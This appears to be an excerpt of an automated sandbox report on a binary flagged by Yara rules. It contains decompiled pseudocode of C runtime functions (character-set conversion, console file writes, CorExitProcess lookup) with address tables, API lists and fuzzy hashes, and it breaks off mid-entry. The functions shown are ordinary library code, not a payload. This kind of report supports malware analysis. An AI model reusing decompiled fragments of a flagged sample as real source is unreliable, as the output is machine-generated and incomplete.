                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /
                                                                      • API String ID: 0-2043925204
                                                                      • Opcode ID: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                                                      • Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
                                                                      • Opcode Fuzzy Hash: 238c64b91dc00fc8aa7441f00327e0ccbbd6587d23c937c2b2e4721a264c2311
                                                                      • Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				void* _v24;
                                                                      				signed int _t49;
                                                                      				signed int _t54;
                                                                      				int _t56;
                                                                      				signed int _t58;
                                                                      				short* _t60;
                                                                      				signed int _t64;
                                                                      				short* _t68;
                                                                      				int _t76;
                                                                      				short* _t79;
                                                                      				signed int _t85;
                                                                      				signed int _t88;
                                                                      				void* _t93;
                                                                      				void* _t94;
                                                                      				int _t96;
                                                                      				short* _t99;
                                                                      				int _t101;
                                                                      				int _t103;
                                                                      				signed int _t104;
                                                                      				short* _t105;
                                                                      				void* _t108;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t49 =  *0x412014; // 0xfd571264
                                                                      				_v8 = _t49 ^ _t104;
                                                                      				_t101 = _a20;
                                                                      				if(_t101 > 0) {
                                                                      					_t76 = E004080D8(_a16, _t101);
                                                                      					_t108 = _t76 - _t101;
                                                                      					_t4 = _t76 + 1; // 0x1
                                                                      					_t101 = _t4;
                                                                      					if(_t108 >= 0) {
                                                                      						_t101 = _t76;
                                                                      					}
                                                                      				}
                                                                      				_t96 = _a32;
                                                                      				if(_t96 == 0) {
                                                                      					_t96 =  *( *_a4 + 8);
                                                                      					_a32 = _t96;
                                                                      				}
                                                                      				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                                                      				_v12 = _t54;
                                                                      				if(_t54 == 0) {
                                                                      					L38:
                                                                      					E004018CC();
                                                                      					return _t54;
                                                                      				} else {
                                                                      					_t93 = _t54 + _t54;
                                                                      					_t83 = _t93 + 8;
                                                                      					asm("sbb eax, eax");
                                                                      					if((_t93 + 0x00000008 & _t54) == 0) {
                                                                      						_t79 = 0;
                                                                      						__eflags = 0;
                                                                      						L14:
                                                                      						if(_t79 == 0) {
                                                                      							L36:
                                                                      							_t103 = 0;
                                                                      							L37:
                                                                      							E004063D5(_t79);
                                                                      							_t54 = _t103;
                                                                      							goto L38;
                                                                      						}
                                                                      						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                                                      						_t119 = _t56;
                                                                      						if(_t56 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t98 = _v12;
                                                                      						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                                                      						_t103 = _t58;
                                                                      						if(_t103 == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						if((_a12 & 0x00000400) == 0) {
                                                                      							_t94 = _t103 + _t103;
                                                                      							_t85 = _t94 + 8;
                                                                      							__eflags = _t94 - _t85;
                                                                      							asm("sbb eax, eax");
                                                                      							__eflags = _t85 & _t58;
                                                                      							if((_t85 & _t58) == 0) {
                                                                      								_t99 = 0;
                                                                      								__eflags = 0;
                                                                      								L30:
                                                                      								__eflags = _t99;
                                                                      								if(__eflags == 0) {
                                                                      									L35:
                                                                      									E004063D5(_t99);
                                                                      									goto L36;
                                                                      								}
                                                                      								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                                                      								__eflags = _t60;
                                                                      								if(_t60 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								_push(0);
                                                                      								_push(0);
                                                                      								__eflags = _a28;
                                                                      								if(_a28 != 0) {
                                                                      									_push(_a28);
                                                                      									_push(_a24);
                                                                      								} else {
                                                                      									_push(0);
                                                                      									_push(0);
                                                                      								}
                                                                      								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                                                      								__eflags = _t103;
                                                                      								if(_t103 != 0) {
                                                                      									E004063D5(_t99);
                                                                      									goto L37;
                                                                      								} else {
                                                                      									goto L35;
                                                                      								}
                                                                      							}
                                                                      							_t88 = _t94 + 8;
                                                                      							__eflags = _t94 - _t88;
                                                                      							asm("sbb eax, eax");
                                                                      							_t64 = _t58 & _t88;
                                                                      							_t85 = _t94 + 8;
                                                                      							__eflags = _t64 - 0x400;
                                                                      							if(_t64 > 0x400) {
                                                                      								__eflags = _t94 - _t85;
                                                                      								asm("sbb eax, eax");
                                                                      								_t99 = E00403E3D(_t85, _t64 & _t85);
                                                                      								_pop(_t85);
                                                                      								__eflags = _t99;
                                                                      								if(_t99 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								 *_t99 = 0xdddd;
                                                                      								L28:
                                                                      								_t99 =  &(_t99[4]);
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t94 - _t85;
                                                                      							asm("sbb eax, eax");
                                                                      							E004018E0();
                                                                      							_t99 = _t105;
                                                                      							__eflags = _t99;
                                                                      							if(_t99 == 0) {
                                                                      								goto L35;
                                                                      							}
                                                                      							 *_t99 = 0xcccc;
                                                                      							goto L28;
                                                                      						}
                                                                      						_t68 = _a28;
                                                                      						if(_t68 == 0) {
                                                                      							goto L37;
                                                                      						}
                                                                      						_t123 = _t103 - _t68;
                                                                      						if(_t103 > _t68) {
                                                                      							goto L36;
                                                                      						}
                                                                      						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                                                      						if(_t103 != 0) {
                                                                      							goto L37;
                                                                      						}
                                                                      						goto L36;
                                                                      					}
                                                                      					asm("sbb eax, eax");
                                                                      					_t70 = _t54 & _t93 + 0x00000008;
                                                                      					_t83 = _t93 + 8;
                                                                      					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                                                      						__eflags = _t93 - _t83;
                                                                      						asm("sbb eax, eax");
                                                                      						_t79 = E00403E3D(_t83, _t70 & _t83);
                                                                      						_pop(_t83);
                                                                      						__eflags = _t79;
                                                                      						if(__eflags == 0) {
                                                                      							goto L36;
                                                                      						}
                                                                      						 *_t79 = 0xdddd;
                                                                      						L12:
                                                                      						_t79 =  &(_t79[4]);
                                                                      						goto L14;
                                                                      					}
                                                                      					asm("sbb eax, eax");
                                                                      					E004018E0();
                                                                      					_t79 = _t105;
                                                                      					if(_t79 == 0) {
                                                                      						goto L36;
                                                                      					}
                                                                      					 *_t79 = 0xcccc;
                                                                      					goto L12;
                                                                      				}
                                                                      			}


























                                                                      0x004078d4
                                                                      0x004078d5
                                                                      0x004078d6
                                                                      0x004078dd
                                                                      0x004078e2
                                                                      0x004078e8
                                                                      0x004078ee
                                                                      0x004078f4
                                                                      0x004078f7
                                                                      0x004078f7
                                                                      0x004078fa
                                                                      0x004078fc
                                                                      0x004078fc
                                                                      0x004078fa
                                                                      0x004078fe
                                                                      0x00407903
                                                                      0x0040790a
                                                                      0x0040790d
                                                                      0x0040790d
                                                                      0x00407929
                                                                      0x0040792f
                                                                      0x00407934
                                                                      0x00407ac7
                                                                      0x00407ad2
                                                                      0x00407ada
                                                                      0x0040793a
                                                                      0x0040793a
                                                                      0x0040793d
                                                                      0x00407942
                                                                      0x00407946
                                                                      0x0040799a
                                                                      0x0040799a
                                                                      0x0040799c
                                                                      0x0040799e
                                                                      0x00407abc
                                                                      0x00407abc
                                                                      0x00407abe
                                                                      0x00407abf
                                                                      0x00407ac5
                                                                      0x00000000
                                                                      0x00407ac5
                                                                      0x004079af
                                                                      0x004079b5
                                                                      0x004079b7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004079bd
                                                                      0x004079cf
                                                                      0x004079d4
                                                                      0x004079d8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004079e5
                                                                      0x00407a1f
                                                                      0x00407a22
                                                                      0x00407a25
                                                                      0x00407a27
                                                                      0x00407a29
                                                                      0x00407a2b
                                                                      0x00407a77
                                                                      0x00407a77
                                                                      0x00407a79
                                                                      0x00407a79
                                                                      0x00407a7b
                                                                      0x00407ab5
                                                                      0x00407ab6
                                                                      0x00000000
                                                                      0x00407abb
                                                                      0x00407a8f
                                                                      0x00407a94
                                                                      0x00407a96
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407a9a
                                                                      0x00407a9b
                                                                      0x00407a9c
                                                                      0x00407a9f
                                                                      0x00407adb
                                                                      0x00407ade
                                                                      0x00407aa1
                                                                      0x00407aa1
                                                                      0x00407aa2
                                                                      0x00407aa2
                                                                      0x00407aaf
                                                                      0x00407ab1
                                                                      0x00407ab3
                                                                      0x00407ae4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407ab3
                                                                      0x00407a2d
                                                                      0x00407a30
                                                                      0x00407a32
                                                                      0x00407a34
                                                                      0x00407a36
                                                                      0x00407a39
                                                                      0x00407a3e
                                                                      0x00407a59
                                                                      0x00407a5b
                                                                      0x00407a65
                                                                      0x00407a67
                                                                      0x00407a68
                                                                      0x00407a6a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407a6c
                                                                      0x00407a72
                                                                      0x00407a72
                                                                      0x00000000
                                                                      0x00407a72
                                                                      0x00407a40
                                                                      0x00407a42
                                                                      0x00407a46
                                                                      0x00407a4b
                                                                      0x00407a4d
                                                                      0x00407a4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407a51
                                                                      0x00000000
                                                                      0x00407a51
                                                                      0x004079e7
                                                                      0x004079ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004079f2
                                                                      0x004079f4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407a10
                                                                      0x00407a14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407a1a
                                                                      0x0040794d
                                                                      0x0040794f
                                                                      0x00407951
                                                                      0x00407959
                                                                      0x00407978
                                                                      0x0040797a
                                                                      0x00407984
                                                                      0x00407986
                                                                      0x00407987
                                                                      0x00407989
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040798f
                                                                      0x00407995
                                                                      0x00407995
                                                                      0x00000000
                                                                      0x00407995
                                                                      0x0040795d
                                                                      0x00407961
                                                                      0x00407966
                                                                      0x0040796a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00407970
                                                                      0x00000000
                                                                      0x00407970

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                                      • __alloca_probe_16.LIBCMT ref: 00407961
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                                      • __alloca_probe_16.LIBCMT ref: 00407A46
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                                      • __freea.LIBCMT ref: 00407AB6
                                                                        • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                      • __freea.LIBCMT ref: 00407ABF
                                                                      • __freea.LIBCMT ref: 00407AE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 3864826663-0
                                                                      • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                      • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                                                                      • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                                                                      • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                      				signed int _v8;
                                                                      				signed char _v15;
                                                                      				char _v16;
                                                                      				void _v24;
                                                                      				short _v28;
                                                                      				char _v31;
                                                                      				void _v32;
                                                                      				long _v36;
                                                                      				intOrPtr _v40;
                                                                      				void* _v44;
                                                                      				signed int _v48;
                                                                      				signed char* _v52;
                                                                      				long _v56;
                                                                      				int _v60;
                                                                      				void* __ebx;
                                                                      				signed int _t78;
                                                                      				signed int _t80;
                                                                      				int _t86;
                                                                      				void* _t93;
                                                                      				long _t96;
                                                                      				void _t104;
                                                                      				void* _t111;
                                                                      				signed int _t115;
                                                                      				signed int _t118;
                                                                      				signed char _t123;
                                                                      				signed char _t128;
                                                                      				intOrPtr _t129;
                                                                      				signed int _t131;
                                                                      				signed char* _t133;
                                                                      				intOrPtr* _t136;
                                                                      				signed int _t138;
                                                                      				void* _t139;
                                                                      
                                                                      				_t78 =  *0x412014; // 0xfd571264
                                                                      				_v8 = _t78 ^ _t138;
                                                                      				_t80 = _a8;
                                                                      				_t118 = _t80 >> 6;
                                                                      				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                                      				_t133 = _a12;
                                                                      				_v52 = _t133;
                                                                      				_v48 = _t118;
                                                                      				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                                                                      				_v40 = _a16 + _t133;
                                                                      				_t86 = GetConsoleCP();
                                                                      				_t136 = _a4;
                                                                      				_v60 = _t86;
                                                                      				 *_t136 = 0;
                                                                      				 *((intOrPtr*)(_t136 + 4)) = 0;
                                                                      				 *((intOrPtr*)(_t136 + 8)) = 0;
                                                                      				while(_t133 < _v40) {
                                                                      					_v28 = 0;
                                                                      					_v31 =  *_t133;
                                                                      					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                                                                      					_t123 =  *(_t129 + _t115 + 0x2d);
                                                                      					if((_t123 & 0x00000004) == 0) {
                                                                      						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                      							_push(1);
                                                                      							_push(_t133);
                                                                      							goto L8;
                                                                      						} else {
                                                                      							if(_t133 >= _v40) {
                                                                      								_t131 = _v48;
                                                                      								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                                                                      								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                                      								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                      							} else {
                                                                      								_t111 = E00407222( &_v28, _t133, 2);
                                                                      								_t139 = _t139 + 0xc;
                                                                      								if(_t111 != 0xffffffff) {
                                                                      									_t133 =  &(_t133[1]);
                                                                      									goto L9;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t128 = _t123 & 0x000000fb;
                                                                      						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                                                                      						_push(2);
                                                                      						_v15 = _t128;
                                                                      						 *(_t129 + _t115 + 0x2d) = _t128;
                                                                      						_push( &_v16);
                                                                      						L8:
                                                                      						_push( &_v28);
                                                                      						_t93 = E00407222();
                                                                      						_t139 = _t139 + 0xc;
                                                                      						if(_t93 != 0xffffffff) {
                                                                      							L9:
                                                                      							_t133 =  &(_t133[1]);
                                                                      							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                      							_v56 = _t96;
                                                                      							if(_t96 != 0) {
                                                                      								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                                                                      									L19:
                                                                      									 *_t136 = GetLastError();
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                                                                      									if(_v36 >= _v56) {
                                                                      										if(_v31 != 0xa) {
                                                                      											goto L16;
                                                                      										} else {
                                                                      											_t104 = 0xd;
                                                                      											_v32 = _t104;
                                                                      											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												if(_v36 >= 1) {
                                                                      													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                                                                      													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                                                                      													goto L16;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L20;
                                                                      					L16:
                                                                      				}
                                                                      				L20:
                                                                      				E004018CC();
                                                                      				return _t136;
                                                                      			}



































                                                                      0x0040822b
                                                                      0x00408232
                                                                      0x00408235
                                                                      0x0040823d
                                                                      0x00408241
                                                                      0x0040824d
                                                                      0x00408250
                                                                      0x00408253
                                                                      0x0040825a
                                                                      0x00408262
                                                                      0x00408265
                                                                      0x0040826b
                                                                      0x00408271
                                                                      0x00408276
                                                                      0x00408278
                                                                      0x0040827b
                                                                      0x00408280
                                                                      0x0040828a
                                                                      0x00408291
                                                                      0x00408294
                                                                      0x0040829b
                                                                      0x004082a2
                                                                      0x004082ce
                                                                      0x004082f4
                                                                      0x004082f6
                                                                      0x00000000
                                                                      0x004082d0
                                                                      0x004082d3
                                                                      0x0040839a
                                                                      0x004083a6
                                                                      0x004083b1
                                                                      0x004083b6
                                                                      0x004082d9
                                                                      0x004082e0
                                                                      0x004082e5
                                                                      0x004082eb
                                                                      0x004082f1
                                                                      0x00000000
                                                                      0x004082f1
                                                                      0x004082eb
                                                                      0x004082d3
                                                                      0x004082a4
                                                                      0x004082a8
                                                                      0x004082ab
                                                                      0x004082b1
                                                                      0x004082b3
                                                                      0x004082b6
                                                                      0x004082ba
                                                                      0x004082f7
                                                                      0x004082fa
                                                                      0x004082fb
                                                                      0x00408300
                                                                      0x00408306
                                                                      0x0040830c
                                                                      0x0040831b
                                                                      0x00408321
                                                                      0x00408327
                                                                      0x0040832c
                                                                      0x00408348
                                                                      0x004083bb
                                                                      0x004083c1
                                                                      0x0040834a
                                                                      0x00408352
                                                                      0x0040835b
                                                                      0x00408361
                                                                      0x00000000
                                                                      0x00408363
                                                                      0x00408365
                                                                      0x00408368
                                                                      0x00408381
                                                                      0x00000000
                                                                      0x00408383
                                                                      0x00408387
                                                                      0x00408389
                                                                      0x0040838c
                                                                      0x00000000
                                                                      0x0040838c
                                                                      0x00408387
                                                                      0x00408381
                                                                      0x00408361
                                                                      0x0040835b
                                                                      0x00408348
                                                                      0x0040832c
                                                                      0x00408306
                                                                      0x00000000
                                                                      0x0040838f
                                                                      0x0040838f
                                                                      0x004083c3
                                                                      0x004083cd
                                                                      0x004083d5

                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                                                                      • __fassign.LIBCMT ref: 004082E0
                                                                      • __fassign.LIBCMT ref: 004082FB
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                                                                      • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                                                                      • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                      • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                                                                      • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                                                                      • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 27%
                                                                      			E00403632(void* __ecx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _t10;
                                                                      				int _t12;
                                                                      				int _t18;
                                                                      				signed int _t20;
                                                                      
                                                                      				_t10 =  *0x412014; // 0xfd571264
                                                                      				_v8 = _t10 ^ _t20;
                                                                      				_v12 = _v12 & 0x00000000;
                                                                      				_t12 =  &_v12;
                                                                      				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                                                      				if(_t12 != 0) {
                                                                      					_t12 = GetProcAddress(_v12, "CorExitProcess");
                                                                      					_t18 = _t12;
                                                                      					if(_t18 != 0) {
                                                                      						E0040C15C();
                                                                      						_t12 =  *_t18(_a4);
                                                                      					}
                                                                      				}
                                                                      				if(_v12 != 0) {
                                                                      					_t12 = FreeLibrary(_v12);
                                                                      				}
                                                                      				E004018CC();
                                                                      				return _t12;
                                                                      			}









                                                                      0x00403639
                                                                      0x00403640
                                                                      0x00403643
                                                                      0x00403647
                                                                      0x00403652
                                                                      0x0040365a
                                                                      0x00403665
                                                                      0x0040366b
                                                                      0x0040366f
                                                                      0x00403676
                                                                      0x0040367c
                                                                      0x0040367c
                                                                      0x0040367e
                                                                      0x00403683
                                                                      0x00403688
                                                                      0x00403688
                                                                      0x00403693
                                                                      0x0040369b

                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                      • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                                      • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                                                                      • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				char _v16;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				void* _v40;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				signed int _t34;
                                                                      				signed int _t40;
                                                                      				int _t45;
                                                                      				int _t52;
                                                                      				void* _t53;
                                                                      				void* _t55;
                                                                      				int _t57;
                                                                      				signed int _t63;
                                                                      				int _t67;
                                                                      				short* _t71;
                                                                      				signed int _t72;
                                                                      				short* _t73;
                                                                      
                                                                      				_t34 =  *0x412014; // 0xfd571264
                                                                      				_v8 = _t34 ^ _t72;
                                                                      				_push(_t53);
                                                                      				E00403F2B(_t53,  &_v28, __edx, _a4);
                                                                      				_t57 = _a24;
                                                                      				if(_t57 == 0) {
                                                                      					_t52 =  *(_v24 + 8);
                                                                      					_t57 = _t52;
                                                                      					_a24 = _t52;
                                                                      				}
                                                                      				_t67 = 0;
                                                                      				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                      				_v12 = _t40;
                                                                      				if(_t40 == 0) {
                                                                      					L15:
                                                                      					if(_v16 != 0) {
                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                      					}
                                                                      					E004018CC();
                                                                      					return _t67;
                                                                      				}
                                                                      				_t55 = _t40 + _t40;
                                                                      				_t17 = _t55 + 8; // 0x8
                                                                      				asm("sbb eax, eax");
                                                                      				if((_t17 & _t40) == 0) {
                                                                      					_t71 = 0;
                                                                      					L11:
                                                                      					if(_t71 != 0) {
                                                                      						E00402460(_t67, _t71, _t67, _t55);
                                                                      						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                                                                      						if(_t45 != 0) {
                                                                      							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                                                                      						}
                                                                      					}
                                                                      					L14:
                                                                      					E004063D5(_t71);
                                                                      					goto L15;
                                                                      				}
                                                                      				_t20 = _t55 + 8; // 0x8
                                                                      				asm("sbb eax, eax");
                                                                      				_t47 = _t40 & _t20;
                                                                      				_t21 = _t55 + 8; // 0x8
                                                                      				_t63 = _t21;
                                                                      				if((_t40 & _t20) > 0x400) {
                                                                      					asm("sbb eax, eax");
                                                                      					_t71 = E00403E3D(_t63, _t47 & _t63);
                                                                      					if(_t71 == 0) {
                                                                      						goto L14;
                                                                      					}
                                                                      					 *_t71 = 0xdddd;
                                                                      					L9:
                                                                      					_t71 =  &(_t71[4]);
                                                                      					goto L11;
                                                                      				}
                                                                      				asm("sbb eax, eax");
                                                                      				E004018E0();
                                                                      				_t71 = _t73;
                                                                      				if(_t71 == 0) {
                                                                      					goto L14;
                                                                      				}
                                                                      				 *_t71 = 0xcccc;
                                                                      				goto L9;
                                                                      			}























                                                                      0x004062c0
                                                                      0x004062c7
                                                                      0x004062ca
                                                                      0x004062d3
                                                                      0x004062d8
                                                                      0x004062dd
                                                                      0x004062e2
                                                                      0x004062e5
                                                                      0x004062e7
                                                                      0x004062e7
                                                                      0x004062ec
                                                                      0x00406305
                                                                      0x0040630b
                                                                      0x00406310
                                                                      0x004063af
                                                                      0x004063b3
                                                                      0x004063b8
                                                                      0x004063b8
                                                                      0x004063cc
                                                                      0x004063d4
                                                                      0x004063d4
                                                                      0x00406316
                                                                      0x00406319
                                                                      0x0040631e
                                                                      0x00406322
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406372
                                                                      0x00406377
                                                                      0x0040638e
                                                                      0x00406396
                                                                      0x004063a6
                                                                      0x004063a6
                                                                      0x00406396
                                                                      0x004063a8
                                                                      0x004063a9
                                                                      0x00000000
                                                                      0x004063ae
                                                                      0x00406324
                                                                      0x00406329
                                                                      0x0040632b
                                                                      0x0040632d
                                                                      0x0040632d
                                                                      0x00406335
                                                                      0x00406352
                                                                      0x0040635c
                                                                      0x00406361
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406363
                                                                      0x00406369
                                                                      0x00406369
                                                                      0x00000000
                                                                      0x00406369
                                                                      0x00406339
                                                                      0x0040633d
                                                                      0x00406342
                                                                      0x00406346
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406348
                                                                      0x00000000

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                                      • __alloca_probe_16.LIBCMT ref: 0040633D
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                                      • __freea.LIBCMT ref: 004063A9
                                                                        • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                      • String ID:
                                                                      • API String ID: 313313983-0
                                                                      • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                                                                      • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
